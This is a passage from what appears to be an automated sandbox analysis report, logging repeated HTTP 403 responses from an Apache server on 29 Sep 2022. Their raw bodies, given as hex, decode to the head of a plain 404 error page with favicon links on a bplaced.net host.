78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:16 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=108X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:17 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=111X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:18 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=117X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:19 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=88X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:20 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=121X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:21 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=84X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:22 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=111X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 